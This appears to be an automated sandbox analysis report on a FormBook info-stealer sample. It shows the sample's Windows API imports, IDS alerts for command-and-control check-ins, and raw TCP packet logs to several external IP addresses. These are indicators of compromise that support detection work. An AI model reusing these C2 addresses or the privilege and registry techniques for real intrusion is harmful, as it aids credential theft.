                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishGreat Britain

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-10T18:51:25.795128+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449737185.199.109.15380TCP
                                                                  2025-01-10T18:51:28.331852+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449745185.199.109.15380TCP
                                                                  2025-01-10T18:51:30.986881+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449763185.199.109.15380TCP
                                                                  2025-01-10T18:51:30.986881+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.449763185.199.109.15380TCP
                                                                  2025-01-10T18:51:39.939047+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449811104.21.48.23380TCP
                                                                  2025-01-10T18:51:42.299443+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449824104.21.48.23380TCP
                                                                  2025-01-10T18:51:44.931042+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449835104.21.48.23380TCP
                                                                  2025-01-10T18:51:53.072305+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449882199.59.243.22880TCP
                                                                  2025-01-10T18:51:55.715369+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449898199.59.243.22880TCP
                                                                  2025-01-10T18:51:58.226136+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449913199.59.243.22880TCP
                                                                  2025-01-10T18:52:07.165397+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499658.136.96.10680TCP
                                                                  2025-01-10T18:52:09.706978+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499818.136.96.10680TCP
                                                                  2025-01-10T18:52:12.284358+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499948.136.96.10680TCP
                                                                  2025-01-10T18:52:20.548786+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001969.57.163.6480TCP
                                                                  2025-01-10T18:52:23.174021+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002069.57.163.6480TCP
                                                                  2025-01-10T18:52:25.681094+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002169.57.163.6480TCP
                                                                  2025-01-10T18:52:34.654525+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450023170.33.13.24680TCP
                                                                  2025-01-10T18:52:37.266816+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024170.33.13.24680TCP
                                                                  2025-01-10T18:52:39.932449+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025170.33.13.24680TCP
                                                                  2025-01-10T18:52:48.100839+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002766.235.200.14580TCP
                                                                  2025-01-10T18:52:50.700863+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002866.235.200.14580TCP
                                                                  2025-01-10T18:52:53.207752+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002966.235.200.14580TCP
                                                                  2025-01-10T18:53:02.706420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003185.159.66.9380TCP
                                                                  2025-01-10T18:53:05.362913+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003285.159.66.9380TCP
                                                                  2025-01-10T18:53:07.909571+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003385.159.66.9380TCP
                                                                  2025-01-10T18:53:15.725954+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450035156.253.8.11580TCP
                                                                  2025-01-10T18:53:18.301031+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036156.253.8.11580TCP
                                                                  2025-01-10T18:53:21.087237+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037156.253.8.11580TCP
                                                                  2025-01-10T18:53:29.024786+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003913.248.169.4880TCP
                                                                  2025-01-10T18:53:32.487730+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004013.248.169.4880TCP
                                                                  2025-01-10T18:53:34.086977+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004113.248.169.4880TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 10, 2025 18:51:08.955719948 CET4973680192.168.2.4104.21.36.239
                                                                  Jan 10, 2025 18:51:08.960500002 CET8049736104.21.36.239192.168.2.4
                                                                  Jan 10, 2025 18:51:08.960591078 CET4973680192.168.2.4104.21.36.239
                                                                  Jan 10, 2025 18:51:08.970375061 CET4973680192.168.2.4104.21.36.239
                                                                  Jan 10, 2025 18:51:08.975163937 CET8049736104.21.36.239192.168.2.4
                                                                  Jan 10, 2025 18:51:09.574768066 CET8049736104.21.36.239192.168.2.4
                                                                  Jan 10, 2025 18:51:09.576248884 CET8049736104.21.36.239192.168.2.4
                                                                  Jan 10, 2025 18:51:09.576284885 CET8049736104.21.36.239192.168.2.4
                                                                  Jan 10, 2025 18:51:09.576312065 CET4973680192.168.2.4104.21.36.239
                                                                  Jan 10, 2025 18:51:09.576354027 CET4973680192.168.2.4104.21.36.239
                                                                  Jan 10, 2025 18:51:09.579689980 CET4973680192.168.2.4104.21.36.239
                                                                  Jan 10, 2025 18:51:09.584580898 CET8049736104.21.36.239192.168.2.4
                                                                  Jan 10, 2025 18:51:25.189387083 CET4973780192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:25.194343090 CET8049737185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:25.194464922 CET4973780192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:25.240576029 CET4973780192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:25.245368004 CET8049737185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:25.763183117 CET8049737185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:25.795056105 CET8049737185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:25.795128107 CET4973780192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:26.753268003 CET4973780192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:27.812711000 CET4974580192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:27.817562103 CET8049745185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:27.818561077 CET4974580192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:27.931122065 CET4974580192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:27.936132908 CET8049745185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:28.304838896 CET8049745185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:28.331778049 CET8049745185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:28.331851959 CET4974580192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:29.440685034 CET4974580192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:30.472616911 CET4976380192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:30.477494001 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.477648020 CET4976380192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:30.529994965 CET4976380192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:30.534981966 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.534996986 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.535072088 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.535082102 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.535125971 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.535135984 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.535248041 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.535259008 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.535267115 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.963881969 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.986805916 CET8049763185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:30.986881018 CET4976380192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:32.050024986 CET4976380192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:33.068563938 CET4978180192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:33.073458910 CET8049781185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:33.073587894 CET4978180192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:33.083363056 CET4978180192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:33.088284969 CET8049781185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:33.587296963 CET8049781185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:33.623481989 CET8049781185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:33.623600006 CET4978180192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:33.624432087 CET4978180192.168.2.4185.199.109.153
                                                                  Jan 10, 2025 18:51:33.629426956 CET8049781185.199.109.153192.168.2.4
                                                                  Jan 10, 2025 18:51:39.011748075 CET4981180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:39.018090010 CET8049811104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:39.018229008 CET4981180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:39.032830954 CET4981180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:39.038827896 CET8049811104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:39.910972118 CET8049811104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:39.938961983 CET8049811104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:39.939047098 CET4981180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:40.534395933 CET4981180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:41.553412914 CET4982480192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:41.558337927 CET8049824104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:41.558423042 CET4982480192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:41.573720932 CET4982480192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:41.578551054 CET8049824104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:42.298978090 CET8049824104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:42.299398899 CET8049824104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:42.299443007 CET4982480192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:43.081170082 CET4982480192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:44.152842045 CET4983580192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:44.157629967 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.157702923 CET4983580192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:44.234657049 CET4983580192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:44.240057945 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.240072966 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.240082979 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.240092039 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.240101099 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.240195990 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.240206003 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.240356922 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.240367889 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.929955006 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.930983067 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.931041956 CET4983580192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:45.737539053 CET4983580192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:46.842089891 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:46.846990108 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:46.847075939 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:46.916726112 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:46.921741962 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:47.516448975 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:47.516563892 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:47.516714096 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:47.518328905 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:47.518385887 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:47.519788980 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:47.524595022 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:52.605115891 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:52.609992981 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:52.610081911 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:52.626663923 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:52.631545067 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:53.072082043 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:53.072132111 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:53.072212934 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:53.072304964 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:53.075859070 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:54.128144979 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.147166967 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.152216911 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.152354956 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.168140888 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.173015118 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.715234995 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.715260983 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.715271950 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.715368986 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.715536118 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:56.675107002 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:57.694377899 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:57.699276924 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.699431896 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:57.715754032 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:57.720855951 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720869064 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720877886 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720886946 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720927000 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720937014 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.721016884 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.721025944 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.721035957 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:58.225920916 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:58.225967884 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:58.226011038 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:58.226135969 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:58.226224899 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:59.221884012 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.241240025 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.246139050 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.246289968 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.256920099 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.261775970 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.746696949 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.746747017 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.746798038 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.746895075 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.746921062 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.749650955 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.754553080 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:06.201484919 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:06.206536055 CET80499658.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:06.206675053 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:06.223392010 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:06.228554964 CET80499658.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:07.165193081 CET80499658.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:07.165323973 CET80499658.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:07.165396929 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:07.737729073 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:08.756448984 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:08.761353016 CET80499818.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:08.761456013 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:08.775963068 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:08.780850887 CET80499818.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:09.706751108 CET80499818.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:09.706921101 CET80499818.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:09.706978083 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:10.284432888 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:11.303469896 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:11.308311939 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.308397055 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:11.323052883 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:11.327903032 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.327914953 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.327977896 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.327987909 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328058004 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328067064 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328093052 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328109980 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328119040 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:12.233537912 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:12.284358025 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:12.453351974 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:12.453407049 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:12.831197977 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:13.852840900 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:13.857625008 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:13.857691050 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:13.869534969 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:13.874488115 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:14.811527014 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:14.811976910 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:14.812170029 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:14.815103054 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:14.819849968 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:19.847639084 CET5001980192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:19.852442026 CET805001969.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:19.852530956 CET5001980192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:19.940507889 CET5001980192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:19.945527077 CET805001969.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:20.548613071 CET805001969.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:20.548717022 CET805001969.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:20.548785925 CET5001980192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:21.456414938 CET5001980192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:22.475195885 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:22.479990005 CET805002069.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:22.480071068 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:22.496164083 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:22.501019955 CET805002069.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:23.173947096 CET805002069.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:23.173969984 CET805002069.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:23.174021006 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:24.004914045 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:25.022638083 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:25.029191971 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.029308081 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:25.045869112 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:25.050745010 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050760984 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050785065 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050795078 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050839901 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050849915 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050972939 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050981998 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050993919 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.680994987 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.681041956 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.681093931 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:26.550183058 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:27.568738937 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:27.573548079 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:27.573662996 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:27.583806038 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:27.588629961 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:28.272419930 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:28.272500038 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:28.272599936 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:28.275580883 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:28.280527115 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:33.774058104 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:33.778927088 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:33.779045105 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:33.795064926 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:33.799875975 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:34.654228926 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:34.654453993 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:34.654525042 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:34.654560089 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:34.654613018 CET5002380192.168.2.4170.33.13.246
